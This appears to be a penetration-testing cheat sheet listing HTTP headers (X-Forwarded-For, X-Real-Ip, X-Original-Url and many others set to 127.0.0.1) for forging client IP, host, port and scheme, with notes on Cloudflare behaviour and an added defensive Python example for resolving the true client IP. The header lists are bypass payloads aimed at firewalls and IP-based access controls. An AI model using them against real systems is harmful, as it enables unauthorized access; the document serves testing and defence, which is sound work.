# [Pentest] HTTP IP Forge

Generic URL / host override headers:

```
Base-Url: 127.0.0.1
Http-Url: 127.0.0.1
Proxy-Host: 127.0.0.1
Proxy-Url: 127.0.0.1
Real-Ip: 127.0.0.1
Redirect: 127.0.0.1
Referer: 127.0.0.1
Referrer: 127.0.0.1
Refferer: 127.0.0.1
Request-Uri: 127.0.0.1
Uri: 127.0.0.1
Url: 127.0.0.1
```

---

Client IP / forwarding headers:

```
Client-IP: 127.0.0.1
X-Cluster-Client-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-For-Original: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Forwarded-Server: 127.0.0.1
X-Forwarded: 127.0.0.1
X-Forwarder-For: 127.0.0.1
X-Host: 127.0.0.1
X-Http-Destinationurl: 127.0.0.1
X-Http-Host-Override: 127.0.0.1
X-Original-Remote-Addr: 127.0.0.1
X-Original-Url: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Proxy-Url: 127.0.0.1
X-Real-Ip: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Rewrite-Url: 127.0.0.1
X-True-IP: 127.0.0.1
via: 127.0.0.1
```

---

Cloudflare: `X-Forwarded-For`, `CF-Connecting-IP`, `Fastly-Client-Ip`, `True-Client-Ip`, `X-Real-IP`

- Cloudflare adds headers to requests to the origin server (by default), but does not allow rewriting them:

```
CF-IPCountry: MT
X-Forwarded-For: 1.1.1.1,22.22.22.22
CF-RAY: 4769ea42a630be43-MXP
X-Forwarded-Proto: http
CF-Visitor: {"scheme":"http"}
CF-Connecting-IP: 22.22.22.22
Accept-Encoding: gzip
```

- we can send our own values in `X-Forwarded-For` and they will be prepended to CF's request (`ip_from_us, real_ip`)
- rewriting `CF-Connecting-IP` is not allowed (403)

https://github.com/GrrrDog/weird_proxies/blob/master/Cloudflare.md

---

Port / scheme override headers:

```
X-Forwarded-Port: 443
X-Forwarded-Port: 4443
X-Forwarded-Port: 80
X-Forwarded-Port: 8080
X-Forwarded-Port: 8443
X-Forwarded-Scheme: http
X-Forwarded-Scheme: https
```

## Uses

- Firewall bypass
- Directly displaying unauthorized pages
- Timing-difference analysis attack
  - e.g. response time of a normal `403` block: 50ms; response time of a `403` after WAF bypass: 5ms
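The defender-side counterpart to the lists above, as an added example that is not part of the original cheat sheet: an origin that reads the first `X-Forwarded-For` value is fooled by a spoofed `127.0.0.1`, because (as the Cloudflare notes show) a proxy only appends to that header; the hardened version walks the chain from the right and stops at the first hop that is not a trusted proxy. The trusted proxy address and the request headers are constructed for the example.

```python
# Added example: resolving the client IP behind a reverse proxy so that a
# spoofed "X-Forwarded-For: 127.0.0.1" cannot bypass IP-based access control.
# Not from the original cheat sheet; TRUSTED_PROXIES and the headers are constructed.
import ipaddress

# Addresses of reverse proxies we operate or trust (constructed for this example).
TRUSTED_PROXIES = [ipaddress.ip_network("203.0.113.10/32")]

def is_trusted_proxy(addr: str) -> bool:
    ip = ipaddress.ip_address(addr)  # raises ValueError on malformed input
    return any(ip in net for net in TRUSTED_PROXIES)

def naive_client_ip(remote_addr: str, headers: dict) -> str:
    """Vulnerable: trusts the leftmost X-Forwarded-For value, which the
    client controls because the proxy only appends its own observation."""
    xff = headers.get("X-Forwarded-For")
    return xff.split(",")[0].strip() if xff else remote_addr

def client_ip(remote_addr: str, headers: dict) -> str:
    """Hardened: only consult X-Forwarded-For when the TCP peer is a trusted
    proxy, then walk the chain from the right, skipping trusted proxies; the
    first untrusted hop is the real client. Anything further left was
    supplied by the client and is ignored."""
    if not is_trusted_proxy(remote_addr):
        return remote_addr  # direct connection: the header is untrusted
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            if not is_trusted_proxy(hop):
                return hop
        except ValueError:
            return remote_addr  # malformed value: fall back to the peer address
    return remote_addr  # chain contained only our own proxies

def is_loopback_client(remote_addr: str, headers: dict) -> bool:
    """The check an 'internal only' page should use instead of the naive one."""
    return ipaddress.ip_address(client_ip(remote_addr, headers)).is_loopback

if __name__ == "__main__":
    # Constructed request: attacker at 198.51.100.7 behind the trusted proxy,
    # sending a forged leftmost value. The proxy appended the real address.
    spoofed = {"X-Forwarded-For": "127.0.0.1, 198.51.100.7"}
    print(naive_client_ip("203.0.113.10", spoofed))  # 127.0.0.1 (access-control bypass)
    print(client_ip("203.0.113.10", spoofed))        # 198.51.100.7
```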